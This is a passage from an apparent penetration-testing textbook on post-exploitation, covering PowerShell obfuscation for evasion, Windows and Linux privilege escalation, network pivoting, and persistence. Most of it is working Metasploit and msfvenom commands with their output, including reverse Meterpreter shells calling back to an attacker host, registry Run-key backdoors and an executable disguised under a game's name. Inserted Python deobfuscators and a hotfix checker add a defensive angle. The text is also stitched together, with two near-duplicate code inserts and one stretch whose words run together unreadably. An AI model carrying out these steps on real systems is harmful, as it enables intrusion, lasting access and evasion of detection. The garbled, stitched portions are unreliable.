You now have a foothold on the system. What you can do with it depends on what you compromised. You may have limited permissions if the remote service you compromised has limited permissions. You can only perform tasks that you have permissions to perform. This means you may need to escalate your privileges to a user with more than you have. Gaining root or administrator permissions is a common objective for attackers since it helps them pivot to other systems to move laterally within the environment. You may also have a better chance to collect passwords and other critical system information that you may need for other tasks.

You not only have a foothold on the system, but that system gives you a foothold on the network as well. You may find, especially if you have compromised a system offering services to the outside world, that the system is connected to more than one network. This means you can use the compromised system as a gateway to those other networks. This is a technique called pivoting, where you pivot off the compromised system to take a look at another set of systems. This will get you further into the network and potentially gain you even more sensitive information or access to more critical systems.

Attackers will also look to gain persistent access to the system. This may mean a number of activities, from creating users to installing backdoors. Alongside persistent access, the attacker will want to cover their tracks. This can mean hiding data in places on the system. It may mean manipulating logs. It can also mean manipulating system binaries to help hide your existence.

Evasion

Once you have a foothold, which may include usernames and passwords or actual remote access to a system, you may run into problems. Both workstations and servers will probably have at least anti-malware, if not software that will look for anomalous behavior. Endpoint detection and response (EDR) software will know what attack techniques look like. Common tools, such as those discussed in this chapter, may be well known to these sorts of tools. This calls for evasive tactics.

There are two potential places where this evasion needs to take place. The first is detecting files, primarily on disk. You may be able to use techniques like alternate data streams, mentioned later. You can also encrypt or otherwise obfuscate data. Encrypted zip files are one way to get around detection in anti-malware software.

When it comes to execution, though, we have another problem. Anti-malware software may have ways of detecting executables. You may be able to get around this by using PowerShell to perform the same task. There may not be a detection in place for a PowerShell script, especially if you write your own, and you may be able to accomplish the same task that a native executable is doing for you. One of the problems with PowerShell is it may be logged. This can make detection after the fact easier, but not if the logged PowerShell can't be read. As an example, the following is a sample of PowerShell that has been obfuscated:

$N7=[char[]]"noisserpxE-ekovnI|)93]rahC[,'pQm'ecalpeR-43]rahC[,'bg0'ecalpeR-)')pQm'+'nepQ'+'m+pQme'+'rGpQm'+'('+'roloCdnu'+'orger'+'oF-)bg0nbg0'+'+bg0oibg0'+'+bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+bg0Ib'+'g'+'0'+'()'+'bg'+'0tsO'+'bg0'+'+bg'+'0H'+'-'+'ebg0'+''+'+b'+'g0'+'tIRwb'+'g0(.'((";[Array]::Reverse($N7);IEX($N7-Join'')

Read it from the end: the string is stored reversed, reversed back at run time with [Array]::Reverse, joined, and handed to IEX (Invoke-Expression). Inside, every token is split into quoted fragments glued with +, and the quote characters themselves are replaced by placeholders (bg0 and pQm) that a trailing -Replace turns back into [Char]34 and [Char]39. Undo all of that and the script is simply Write-Host "Invoke-Obfuscation" -ForegroundColor Green. It was produced by Invoke-Obfuscation, a PowerShell obfuscation framework written by Daniel Bohannon that takes a PowerShell script or command and obfuscates it. Keep the limits of this in mind: obfuscation defeats string matching on the script file and on the command line, but PowerShell 5 and later script block logging (event ID 4104) and AMSI see the code after each layer is unwrapped, so the inner Write-Host is still logged when Invoke-Expression runs it. There are different ways to accomplish the obfuscation, as demonstrated when you run the tool without any parameters. The following are the techniques you can use for obfuscating PowerShell with it:

Choose one of the below options:

[*] TOKEN       Obfuscate PowerShell command Tokens
[*] AST         Obfuscate PowerShell Ast nodes (PS3.0+)
[*] STRING      Obfuscate entire command as a String
[*] ENCODING    Obfuscate entire command via Encoding
[*] COMPRESS    Convert entire command to one-liner and Compress
[*] LAUNCHER    Obfuscate command args w/ Launcher techniques (run once at end)
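Unwinding the sample above by hand is tedious, and it is exactly what a defender has to do with a logged script block before deciding what ran, so here is an added example (not part of Invoke-Obfuscation, not the book's code) that does it programmatically: pull the [char[]] literal out of the launcher, reverse it, resolve the -Replace placeholders, concatenate the fragments, collapse the "a"+"b" joins, and strip the .("cmd") indirection. It also scores the script for launcher indicators, the cheap triage step that decides whether the decode is worth running. The sample is the obfuscated string from the listing above with the PDF's soft hyphens normalised; it handles this specific combination of STRING-style tricks, not every Invoke-Obfuscation output.

```python
"""Unwinding the obfuscated PowerShell shown above (added example; not part of
Invoke-Obfuscation). The launcher reverses a character array and pipes it to
IEX, and the payload inside rebuilds its tokens from string concatenation and
-Replace substitutions. This walks the same steps backwards, which is what a
defender does before deciding what a logged script block actually ran.
"""
import re

# Copied from the listing above (soft hyphens normalised to '-').
SAMPLE = (
    "$N7=[char[]]\"noisserpxE-ekovnI|)93]rahC[,'pQm'ecalpeR-43]rahC[,'bg0'ecalpeR-)')pQm'+'nepQ'+"
    "'m+pQme'+'rGpQm'+'('+'roloCdnu'+'orger'+'oF-)bg0nbg0'+'+bg0oibg0'+'+bg0tacbg0'+'+'+"
    "'bg0sufbO-b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+bg0Ib'+'g'+'0'+'()'+'bg'+'0tsO'+'bg0'+'+bg'+"
    "'0H'+'-'+'ebg0'+''+'+b'+'g0'+'tIRwb'+'g0(.'((\";[Array]::Reverse($N7);IEX($N7-Join'')"
)

INDICATORS = ("[Array]::Reverse", "-Join", "IEX", "Invoke-Expression", "[Char]", "-Replace", "[char[]]")


def score(script: str) -> int:
    """Crude triage: count launcher/obfuscation indicators in a script block."""
    return sum(script.count(ind) for ind in INDICATORS)


def unreverse(script: str) -> str:
    """Step 1: recover the string that [Array]::Reverse + -Join hands to IEX."""
    m = re.search(r'\[char\[\]\]"([^"]*)"', script, re.IGNORECASE)
    if not m:
        raise ValueError("no [char[]] literal found")
    return m.group(1)[::-1]


def unwrap_replace(expr: str) -> str:
    """Step 2: apply the trailing -Replace 'token',[Char]NN substitutions to the
    concatenated single-quoted fragments in front of them."""
    subs = re.findall(r"-Replace\s*'([^']*)'\s*,\s*\[Char\](\d+)", expr, re.IGNORECASE)
    body = re.split(r"-Replace", expr, maxsplit=1, flags=re.IGNORECASE)[0]
    joined = "".join(re.findall(r"'([^']*)'", body))      # 'frag'+'frag' -> fragfrag
    for token, code in subs:
        joined = joined.replace(token, chr(int(code)))   # bg0 -> " , pQm -> '
    return joined


def fold_concat(expr: str) -> str:
    """Step 3: collapse "a"+"b" and 'a'+'b' into single literals, then drop the
    .("cmd") indirection PowerShell uses to call a command by string."""
    for q in ('"', "'"):
        pat = re.compile(q + r"([^" + q + r"]*)" + q + r"\s*\+\s*" + q + r"([^" + q + r"]*)" + q)
        while True:
            new = pat.sub(lambda m: q + m.group(1) + m.group(2) + q, expr)
            if new == expr:
                break
            expr = new
    return re.sub(r'\.\((["\'])([^"\']+)\1\)', r"\2", expr)


def deobfuscate(script: str) -> str:
    return fold_concat(unwrap_replace(unreverse(script)))


if __name__ == "__main__":
    print("indicator score:", score(SAMPLE))
    print("decoded:", deobfuscate(SAMPLE))
```

The decoded line comes out as wRIte-HOst("Invoke-Obfuscation")-ForegroundColor('Green'): the random casing is itself one of the TOKEN-level tricks, harmless to PowerShell, which is case-insensitive, and fatal to a case-sensitive signature.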
dasaStringObfuscateentirecommandviaEncodingConvertentirecommandtoone-­linerandCompressObfuscatecommandargsw/Launchertechniques(runonceatend)Thereareseveralotherwaystoobfuscatescriptsanddata.ThismayincludetechniqueslikeencodingpayloadsthathavebeengeneratedbyatoollikeMetasploit.Ultimately,yourobjectiveistogetaccesstoasystem,whichmayincludegettingfilesontoasystemwithoutdetectionor,probablymorelikely,executingprogramsonatargetsystem.PrivilegeEscalationYourmission,shouldyouchoosetoacceptit,istogainroot-­levelaccess.TherewasatimewhenservicesranasrootonUnix/LinuxsystemsorasLocalSystemonWindowssystems,whichisanaccountthathasahighlevelofpermissions.Onceyouhaveroot-­levelaccess,youshouldbeabletogainaccesstoallinformationonthesystemaswellasmakechangestoservicesandmanipulateusers.Whatthismeansisthatyouneedtogetaccesstothesystemfirst,andthenyou’llneedtorunanotherexploittogetelevatedprivileges.WecancontinuetouseMetasploitforthis,solet’sstartwithacompromisedsystemwithaMeterpretershell.Ifwebackgroundtheshellusingthebackground,wecanmakeuseoftheopensessionasawayofinteractingwiththesystem.PostExploitation 
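Before moving on to local exploits, the reversed-string PowerShell sample shown under evasion above deserves one more look from the defender's side. The following is an added example, not code from the book or from Invoke-Obfuscation: a small Python deobfuscator that peels the three layers that sample uses (the reversed [char[]] literal, the -Replace operations that swap placeholder tags back into quote characters, and the 'a'+'b' string splitting). The only non-constructed input is the book's one-liner, copied as printed; the regular expressions are written for that sample's shape and are not a general PowerShell parser.

```python
import re

# The book's sample, copied as printed (the only non-constructed input here).
SAMPLE = (
    "$N7=[char[]]\"noisserpxE-ekovnI|)93]rahC[,'pQm'ecalpeR-43]rahC[,'bg0'ecalpeR-"
    ")')pQm'+'nepQ'+'m+pQme'+'rGpQm'+'('+'roloCdnu'+'orger'+'oF-)bg0nbg0'+'+bg0oibg0'"
    "+'+bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+bg0Ib'+'g'+'0'+'()'"
    "+'bg'+'0tsO'+'bg0'+'+bg'+'0H'+'-'+'ebg0'+''+'+b'+'g0'+'tIRwb'+'g0(.'((\""
    ";[Array]::Reverse($N7);IEX($N7-Join'')"
)

CHAR_ARRAY = re.compile(r'\[char\[\]\]"([^"]*)"', re.IGNORECASE)
REPLACE_OP = re.compile(r"-Replace'([^']*)',\[Char\](\d+)", re.IGNORECASE)
SQ_FRAGMENT = re.compile(r"'([^']*)'")
CONCAT_DQ = re.compile(r'"([^"]*)"\+"([^"]*)"')
CONCAT_SQ = re.compile(r"'([^']*)'\+'([^']*)'")


def layer1_reverse(one_liner):
    """Pull the [char[]] literal out and undo [Array]::Reverse if it is applied."""
    m = CHAR_ARRAY.search(one_liner)
    if not m:
        raise ValueError("no [char[]] literal found")
    literal = m.group(1)
    return literal[::-1] if "[Array]::Reverse" in one_liner else literal


def layer2_replace(expr):
    """Join the 'a'+'b' fragments, then apply the trailing -Replace 'tag',[Char]N
    operations, which swap placeholder tags back into the quote characters."""
    ops = [(tag, chr(int(code))) for tag, code in REPLACE_OP.findall(expr)]
    body = REPLACE_OP.sub("", expr)
    text = "".join(SQ_FRAGMENT.findall(body))
    for tag, ch in ops:
        text = text.replace(tag, ch)
    return text


def layer3_concat(text):
    """Fold "x"+"y" and 'x'+'y' back into single literals until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = CONCAT_DQ.sub(r'"\1\2"', text)
        text = CONCAT_SQ.sub(r"'\1\2'", text)
    return text


def deobfuscate(one_liner):
    text = layer3_concat(layer2_replace(layer1_reverse(one_liner)))
    # .("Name") is PowerShell's call operator applied to a string: show it as a command.
    return re.sub(r'\.\("([^"]*)"\)', r"\1 ", text)


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Run as a script it prints the recovered command, a Write-Host of the string Invoke-Obfuscation with -ForegroundColor Green; the mixed case in the recovered cmdlet name is the obfuscator's doing and is harmless because PowerShell is case-insensitive. The point for a penetration tester is that reversal-style obfuscation costs a defender about thirty lines to undo; it buys time against signature matching, not against anyone who reads the script.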
We need to identify a local exploit. One way of doing this is to use the Python script windows-exploit-suggester.py, which can be downloaded from GitHub. It requires a couple of things to run beyond a Python interpreter. First is the output from systeminfo. Second is the database containing the Microsoft security bulletin (MSSB) information. To get the first, we'll pull it from our exploited Windows system. We can drop to a Windows shell from Meterpreter and run systeminfo, redirecting the output to a file, and then pull that file back to our local system. You can see that process in the following listing.

Getting System Patch Information

    meterpreter > shell
    Process 3 created.
    Channel 3 created.
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

    C:\Program Files\elasticsearch-1.1.1>systeminfo > patches.txt
    systeminfo > patches.txt

    C:\Program Files\elasticsearch-1.1.1>exit
    exit
    meterpreter > download patches.txt
    [*] Downloading: patches.txt -> patches.txt
    [*] Downloaded 2.21 KiB of 2.21 KiB (100.0%): patches.txt -> patches.txt
    [*] download   : patches.txt -> patches.txt

Once we have the patch information, we can move on to using windows-exploit-suggester. We're going to get an updated MSSB database, and then we'll run the script with our two files, looking for local exploits only (-l). You can see running the script in the next code listing. What we get is a list of bulletins whose fixes do not appear in the hotfix list and for which public exploits exist. The output tags each bulletin with [M] when a Metasploit module exists and [E] when an Exploit-DB proof of concept exists, but it doesn't name the module, which means we'll still need to do some searching for that. It does provide links if you want to learn more about the vulnerabilities and the exploits.

Getting Local Exploit Suggestions

    # ./windows-exploit-suggester.py --update
    [*] initiating winsploit version 3.3...
    [+] writing to file 2021-01-09-mssb.xls
    [*] done
    # ./windows-exploit-suggester.py -i patches.txt -d 2021-01-09-mssb.xls -l
    [*] initiating winsploit version 3.3...
    [*] database file detected as xls or xlsx based on extension
    [*] attempting to read from the systeminfo input file
    [+] systeminfo input file read successfully (ascii)
    [*] querying database file for potential vulnerabilities
    [*] comparing the 2 hotfix(es) against the 407 potential bulletins(s) with a database of 137 known exploits
    [*] there are now 407 remaining v
ulns
    [*] searching for local exploits only
    [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
    [+] windows version identified as 'Windows 2008 R2 SP1 64-bit'
    [*]
    [M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
    [*]   https://github.com/foxglovesec/RottenPotato
    [*]   https://github.com/Kevin-Robertson/Tater
    [*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
    --- snip ---
    [E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
    [*]   http://www.exploit-db.com/exploits/35280/ -- .NET Remoting Services Remote Command Execution, PoC
    [*]
    [*] done

Note the numbers in that output: only two hotfixes were found, so the script is essentially reporting every bulletin in its database. The tool does a presence check on KB numbers and does not account for later cumulative updates that supersede an older fix, so its suggestions are leads to verify, not confirmed vulnerabilities.

Some of the suggested exploits won't run under the Windows-on-Windows 64 (WoW64) subsystem. This is the subsystem that allows 32-bit Windows executables to run on 64-bit Windows installations. The exploit would need the ability to run within this subsystem and still be able to exploit the vulnerability. As there is an additional layer of software on 64-bit Windows, some exploits just won't work.

We're going to use the MS16-032 vulnerability. We need to identify the Metasploit module associated with that vulnerability, which means we can just search for the Microsoft bulletin identifier, as you can see in the following code listing. Searching for the bulletin returns a single module.

Searching for Local Exploits

    msf exploit(windows/local/ms15_051_client_copy_image) > search MS16-032

    Matching Modules
    ================
       Name                                                           Disclosure Date  Rank    Description
       ----                                                           ---------------  ----    -----------
       exploit/windows/local/ms16_032_secondary_logon_handle_privesc  2016-03-21       normal  MS16-032 Secondary Logon Handle Privilege Escalation

    msf exploit(windows/local/ms15_051_client_copy_image) > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

Keep in mind that at this point, we have a session open to our target system. To use the local exploit, we need to set the session number we have open. If you need to know which session number to use because you've lost track, you can just use the sessions command once you've backgrounded the Meterpreter session you were in. This is a parameter you will need to set, along with the payload and the local host and port required for the reverse Meterpreter shell. The new handler needs its own port: the handler for the first session is still listening on its port, so here LPORT is set to 4445. You can see setting all the necessary variables and then starting up the exploit.

Using Local Exploit from Metasploit

    msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 2
    SESSION => 2
    msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST 192.168.86.57
    LHOST => 192.168.86.57
    msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LPORT 4445
    LPORT => 4445
    msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit

    [*] Started reverse TCP handler on 192.168.86.57:4445
    [!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
    [*] Writing payload file, C:\ManageEngine\DesktopCentral_Server\bin\ROayyKQ.txt...
    [*] Compressing script contents...
    [+] Compressed size: 3621
    [*] Executing exploit script...

The line about SYSWOW64 PowerShell is the WoW64 issue from above being handled by the module: the session is 32-bit on a 64-bit host, so the module deliberately runs the exploit script under the 32-bit PowerShell. Notice also that it writes the script to disk in the application's bin directory, which is exactly the kind of artifact that endpoint detection looks for.

In some cases, we can't make use of Metasploit. We need to make use of some external tools. This may mean compiling an exploit program. The Linux Privilege Escalation listing that follows shows compromising a Linux system through a vulnerability in the distributed C compiler daemon (distcc) and then escalating privileges with a compiled exploit.
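Returning briefly to the hotfix comparison that windows-exploit-suggester performed above: the core of that tool is a set difference between KB numbers found in systeminfo output and the KB numbers that fix each bulletin. The following is an added example written for this page, not the tool's own code. The systeminfo excerpt and the bulletin table are constructed (the two bulletin/KB pairs are the ones visible in the suggester output above; the local_exploit flag is our own annotation), so the one installed hotfix makes MS14-026 come out as patched while MS16-075 is reported as a candidate.

```python
import re
from collections import namedtuple

# Constructed excerpt of `systeminfo` output, in the layout the real tool parses.
SYSTEMINFO = """\
Host Name:                 VAGRANT-2008R2
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: KB2958732
"""

Bulletin = namedtuple("Bulletin", "id kb title local_exploit")

# Constructed stand-in for the MSSB spreadsheet. The two bulletin/KB pairs are the
# ones that appear in the suggester output above; the local_exploit flag is ours.
BULLETINS = [
    Bulletin("MS16-075", "KB3164038", "Security Update for Windows SMB Server", True),
    Bulletin("MS14-026", "KB2958732",
             "Vulnerability in .NET Framework Could Allow Elevation of Privilege", True),
]

HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)


def parse_hotfixes(systeminfo_text):
    """Return the set of installed KB numbers listed under Hotfix(s)."""
    return {kb.upper() for kb in HOTFIX_RE.findall(systeminfo_text)}


def parse_os_version(systeminfo_text):
    m = re.search(r"^OS Version:\s*(.+)$", systeminfo_text, re.MULTILINE)
    return m.group(1).strip() if m else None


def suggest(installed_kbs, bulletins, local_only=True):
    """Bulletins whose fix KB is not installed. Like the real tool this is a
    presence check only: a KB superseded by a later cumulative update will also be
    absent, so every hit still has to be confirmed on the target."""
    hits = []
    for b in bulletins:
        if local_only and not b.local_exploit:
            continue
        if b.kb.upper() not in installed_kbs:
            hits.append(b)
    return hits


if __name__ == "__main__":
    kbs = parse_hotfixes(SYSTEMINFO)
    print("OS:", parse_os_version(SYSTEMINFO), "| hotfixes:", sorted(kbs))
    for b in suggest(kbs, BULLETINS):
        print(f"[?] {b.id}: {b.title} ({b.kb} missing)")
```

The supersedence caveat in suggest() is the practical limit of this whole approach: on a host that receives monthly rollups the individual bulletin KBs never appear in systeminfo, so the script reports nearly everything, as the "2 hotfix(es) against 407 bulletins" line in the real output above illustrates. Treat its output as a list of things to try, confirmed by the exploit either working or not.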
This makes use of a Metasploit module to perform the initial exploit. The privilege escalation requires a C program to be compiled so it runs on the target system. Since we can't guarantee there is a C compiler on the target, the program is compiled on the attack system. Our target is 32-bit, while our attack system is 64-bit. This means we need the 32-bit libraries and headers installed on the attack system so we can build a 32-bit binary on a 64-bit host (with gcc, the -m32 option with multilib support). Once we have the output, we can put it and a simple shell script into a directory where they will be available from a web server, then fetch them from the target. In this listing, you will see exploiting the target system and then running the privilege escalation.

Linux Privilege Escalation

    msf > use exploit/unix/misc/distcc_exec
    msf exploit(unix/misc/distcc_exec) > set RHOST 192.168.86.66
    RHOST => 192.168.86.66
    msf exploit(unix/misc/distcc_exec) > exploit

    [*] Started reverse TCP double handler on 192.168.86.57:4444
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command: echo 9LVs5a2CaAEk29pj;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets...
    [*] Reading from socket B
    [*] B: "9LVs5a2CaAEk29pj\r\n"
    [*] Matching...
    [*] A is input...
    [*] Command shell session 1 opened (192.168.86.57:4444 -> 192.168.86.66:47936) at 2021-01-09 18:28:22 -0600

    whoami
    daemon
    cd /tmp
    ps auxww | grep udev
    root      2663  0.0  0.1  2216   700 ?   S   ...   --daemon
    daemon    6364  0.0  0.1   ...                     grep udev
    ./escalate 2662
    ...

The shell arrives as the unprivileged daemon user. The exploit used here takes the PID of the udev daemon's netlink socket as its argument, which is why the process listing is consulted first and the number passed to the escalate binary is one less than the udev process ID. The remainder of this listing is not reproduced here.

Pivoting to another network starts from the compromised Windows host. From the Meterpreter session on that host, ipconfig shows every interface the host has, including one on a network we could not reach directly:

    meterpreter > getuid
    Server username: NT AUTHORITY\LOCAL SERVICE
    meterpreter > ipconfig
    Interface  1
    ============
    Name         : Software Loopback Interface 1
    Hardware MAC : 00:00:00:00:00:00
    MTU          : 4294967295
    IPv4 Address : 127.0.0.1
    IPv4 Netmask : 255.0.0.0
    IPv6 Address : ::1
    IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

    Interface 12
    ============
    Name         : Microsoft ISATAP Adapter
    Hardware MAC : 00:00:00:00:00:00
    MTU          : 1280
    IPv6 Address : fe80::5efe:c0a8:5621
    IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff

    Interface 13
    ============
    Name         : Intel(R) PRO/1000 MT Network Connection
    Hardware MAC : 1e:25:07:dc:7c:6e
    MTU          : 1500
    IPv4 Address : 192.168.86.33
    IPv4 Netmask : 255.255.255.0
    IPv6 Address : fe80::35b1:1874:3712:8b59
    IPv6 Netmask : ffff:ffff:ffff:ffff::

    Interface 19
    ============
    Name         : Intel(R) PRO/1000 MT Network Connection #2
    Hardware MAC : 42:39:bd:ec:24:40
    MTU          : 1500
    IPv4 Address : 172.30.42.50
    IPv4 Netmask : 255.255.255.0
    IPv6 Address : fe80::4b4:7b9a:b3b7:3742
    IPv6 Netmask : ffff:ffff:ffff:ffff::

To add the route we need to pass traffic to the 172.30.42.0 subnet, we need to run a post-exploitation module. The module we are going to run is called autoroute, and it will take care of adding the route to that network by way of the session we have open. In the following listing, you can see running the autoroute module. You'll see the output indicating that the route has been added as a result of running the module.

Running Autoroute

    meterpreter > run post/multi/manage/autoroute SUBNET=172.30.42.0 ACTION=ADD
    [!] SESSION may not be compatible with this module.
    [*] Running module against VAGRANT-2008R2
    [*] Adding a route to 172.30.42.0/255.255.255.0...
    [+] Route added to subnet 172.30.42.0/255.255.255.0.

Now that the route is in place, we want to make use of it. We can background the Meterpreter session at this point and run any module we choose against that network. For example, it wouldn't be unusual to run a port scan against that network. In the following code, you can see the routing table being checked from outside of Meterpreter after the session is backgrounded (you can put Meterpreter into the background by either using the background command or pressing Ctrl+Z). The routing table shows that we have a route to the 172.30.42.0
network through Session 1, which is the Meterpreter session we have open. Below that, the port scan module gets loaded up to run against that network.

    msf exploit(windows/http/manageengine_connectionid_write) > route print

    IPv4 Active Routing Table
    =========================

       Subnet             Netmask            Gateway
       ------             -------            -------
       172.30.42.0        255.255.255.0      Session 1

    [*] There are currently no IPv6 routes defined.

    msf exploit(windows/http/manageengine_connectionid_write) > use auxiliary/scanner/portscan/tcp
    msf auxiliary(scanner/portscan/tcp) > set RHOSTS 172.30.42.0/24
    RHOSTS => 172.30.42.0/24
    msf auxiliary(scanner/portscan/tcp) > run

Once you have an idea of what other systems are on the other network, you can start looking for vulnerabilities on those systems. Pivoting is all about taking one compromised system and using it to gain access to other systems, that is, pivoting to those systems. Once you have your network routes in place, you are in good shape to accomplish that pivoting so you can extend your reach into the network. One caveat: a Metasploit route applies only to traffic generated by Metasploit modules. Tools outside the framework do not see it. To send other tools through the session, pair the route with a SOCKS proxy module such as auxiliary/server/socks_proxy and a proxy-aware client (proxychains, for instance).

Persistence

Gaining access is important because it demonstrates that you can compromise systems and gain access to sensitive information. This is a good way to show the organization you are working with where some of their issues may be. However, attackers don't want to have to keep exploiting the same vulnerability each time they want access to the system. For a start, it's time-consuming. Second, if the attacker, even a faux attacker (meaning you), is exploiting a vulnerability, they can't be sure that the vulnerability won't be patched. This means they may not be able to get in later. Gathering information probably isn't a one-and-done situation. Of course, in an enterprise environment, data is constantly changing. No matter what the objective of the attacker is, they will generally want to maintain access to compromised systems.

The process of maintaining access is called persistence. Access to the system persists over time and, ideally, across reboots of the system. No matter what happens, ideally, the attacker can still get into the system when they want. There are several techniques for this. If a system has remote access, such as Secure Shell (SSH) or Remote Desktop on Windows systems, the attacker may just create a new user that has the ability to log in remotely. If the compromised user changes their password or the user account is removed, the new user will still be available to the attacker.

Another option is to install software that will reach out to the attacker's system. This is often the best approach, because firewalls are probably in place that will block inbound connection attempts, but outbound connections are generally allowed. So, we can install a reverse shell package, and it will connect out to our system as long as we have a handler waiting to listen. In the following listing, you can see starting from a Meterpreter session and installing a program that starts when a user logs in. This particular persistence mechanism uses the Registry to store the payload. A Run key under HKEY_CURRENT_USER in the Registry then gets loaded to call the payload.

Registry Persistence from Metasploit

    meterpreter > getuid
    Server username: NT AUTHORITY\LOCAL SERVICE
    meterpreter > background
    [*] Backgrounding session 1...
    msf exploit(windows/http/manageengine_connectionid_write) > use exploit/windows/local/registry_persistence
    msf exploit(windows/local/registry_persistence) > set SESSION 1
    SESSION => 1
    msf exploit(windows/local/registry_persistence) > exploit

    [*] Generating payload blob..
    [+] Generated payload, 5968 bytes
    [*] Root path is HKCU
    [*] Installing payload blob..
    [+] Created registry key HKCU\Software\hO2pqzTh
    [+] Installed payload blob to HKCU\Software\hO2pqzTh\kASCvdW3
    [*] Installing run key

Look at the getuid output before deciding this worked. The session runs as NT AUTHORITY\LOCAL SERVICE, so the HKCU hive written here belongs to that service account (HKU\S-1-5-19), not to a person. Run keys are processed by Explorer at an interactive logon, and a service account never logs on interactively, so a Run key in its hive is unlikely ever to fire. For persistence that actually survives, you want the hive of an interactive user or, with elevated privileges, the HKLM Run key.

This process uses the Registry to store an executable blob, with no control over what gets stored there and executed. You can also create your own executable and use the Registry technique with it. You just won't be able to use the module shown above. To create your own stand-alone executable, you could use the msfvenom program, which is part of Metasploit. In the following code listing, you can see an example of a run of msfvenom. This takes the payload windows/meterpreter/reverse_tcp, which sends a connection back to a Meterpreter handler at the specified IP address.

Using msfvenom to Create a Stand-Alone Payload

    # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.57 LPORT=3445 -f exe -e x86/shikata_ga_nai -a x86 -i 3 -o elfbowling.exe
    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    Found 1 compatible encoders
    Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
    x86/shikata_ga_nai succeeded with size 368 (iteration=0)
    x86/shikata_ga_nai succeeded with size 395 (iteration=1)
    x86/shikata_ga_nai succeeded with size 422 (iteration=2)
    x86/shikata_ga_nai chosen with final size 422
    Payload size: 422 bytes
    Final size of exe file: 73802 bytes
    Saved as: elfbowling.exe
    # ls -la elfbowling.exe
    -rw-r--r-- 1 root root 73802 Sep 12 17:58 elfbowling.exe

Much of what you see in the command-line parameters is fairly straightforward. We're creating an .exe file for an x86 32-bit Windows system. The payload will make a connection to 192.168.86.57 on port 3445. To make use of Meterpreter on the target system, you would need to start a handler (exploit/multi/handler, configured with the same payload, LHOST, and LPORT). As a callback to a couple of silly games from a couple of decades ago, I've called it elfbowling.exe. Perhaps anyone seeing it wouldn't think much of it. In addition to bundling the payload into an .exe file in a proper portable executable format, the payload is also encoded. The stated reason for encoding is to hide it from antivirus programs. In practice, shikata_ga_nai-encoded msfvenom executables have been signatured by essentially every antivirus product for years and are caught on sight; the encoder's real job is avoiding bad characters in the payload, and it should not be counted on for evasion.

There are other ways to create a persistent connection. Another is to use metsvc, the Meterpreter service. It creates a listener, by default on port 31337, that can be connected to in order to get a Meterpreter shell. You will notice that Metasploit mentions that Meterpreter scripts are deprecated. Instead, we should load modules and use them. However, for the moment, the Meterpreter service does work and can be used to gain access, as long as you can connect to the specified port through whatever firewalls may be in place. Note also that the metsvc listener performs no authentication: anyone who can reach that port gets the same shell you do, which is one reason to avoid leaving it on a client's systems.

Creating the Meterpreter Service on the Target

    meterpreter > run metsvc
    [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
    [!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
    [*] Creating a meterpreter service on port 31337
    [*] Creating a temporary installation directory C:\Windows\SERVIC~2\LOCALS~1\AppData\Local\Temp\KrUjwJQb...
    [*]  >> Uploading metsrv.x86.dll...
    [*]  >> Uploading metsvc-server.exe...
    [*]  >> Uploading metsvc.exe...
    [*] Starting the service...

As noted, the Meterpreter service expects that you can connect inbound. Also, the Meterpreter service script is deprecated and may soon be removed from Metasploit. Instead, we can make use of the module that Metasploit points us to. In the next code listing, you will see the use of that module. It requires that you have an executable to upload and install on the target system. What is provided here is the output of the payload creation previously: the reverse Meterpreter executable created with msfvenom. You will see that Meterpreter uploads the payload to the target system and creates a persistence executable. The Registry entries are then created to run the persistence executable automatically when the user logs in. You can see this from the reference to HKCU, which is HKEY_CURRENT_USER, the location in the Registry that holds everything related to the logged-in user. The same caveat as before applies: the short path C:\Windows\SERVIC~2\LOCALS~1 is the profile of the LocalService account (C:\Windows\ServiceProfiles\LocalService), so "the user" whose Run key is being written here is a service account that never logs in interactively.

Using the Metasploit Module for Persistence

    meterpreter > run post/windows/manage/persistence_exe REXEPATH=/root/elfbowling.exe
    [*] Running module against VAGRANT-2008R2
    [*] Reading Payload from file /root/elfbowling.exe
    [+] Persistent Script written to C:\Windows\SERVIC~2\LOCALS~1\AppData\Local\Temp\default.exe
    [*] Executing script C:\Windows\SERVIC~2\LOCALS~1\AppData\Local\Temp\default.exe
    [+] Agent executed with PID 5672
    [*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\qWQPRsRzw
    [+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\qWQPRsRzw
    [*] Cleanup Meterpreter RC File: /root/.msf4/logs/persistence/VAGRANT-2008R2_20210112.4749/VAGRANT-2008R2_20210112.4749.rc

